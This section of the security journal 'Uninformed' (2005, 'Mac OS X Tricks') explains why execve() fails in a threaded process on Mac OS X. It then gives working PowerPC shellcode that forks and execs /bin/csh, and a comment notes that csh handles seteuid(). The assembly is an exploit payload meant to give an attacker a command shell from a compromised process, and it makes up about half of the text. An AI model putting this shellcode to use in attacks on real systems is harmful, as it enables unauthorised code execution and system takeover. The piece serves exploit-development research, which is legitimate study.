Uninformed: Informative Information for the Uninformed

Current v9 v8 v7 v6 v5 v4 v3 v2 v1 All About
Vol 1» 2005.May


Next: Shared Libraries Up: Mac OS X Tricks Previous: System Call Failure   Contents

Threads and Execve

Mac OS X has an undocumented behavior concerning the execve() system call inside a threaded process. If a process tries to call execve() and has more than one active thread, the kernel returns the error EOPNOTSUPP. After a closer look at kern_exec.c in the Darwin XNU source code, it becomes apparent that for shellcode to function properly inside a threaded process, it will need to call either fork() or vfork() before calling execve(). 

;;
;; Fork and execute a command shell
;;
main:
_fork:
    li      r0, 2
    sc
    b       _exitproc

_execsh:                    ; based on ghandi's execve
    xor.    r5, r5, r5
    bnel    _execsh
    mflr    r3
    addi    r3, r3, 32      ; 32
    stw     r3, -8(r1)      ; argv[0] = path
    stw     r5, -4(r1)      ; argv[1] = NULL
    subi    r4, r1, 8       ; r4 = {path, 0}
    li      r0, 59
    sc                      ; execve(path, argv, NULL)
    b       _exitproc

_path:
    .ascii "/bin/csh"       ; csh handles seteuid() for us
    .long   0

_exitproc:
    li      r0, 1
    li      r3, 0
    sc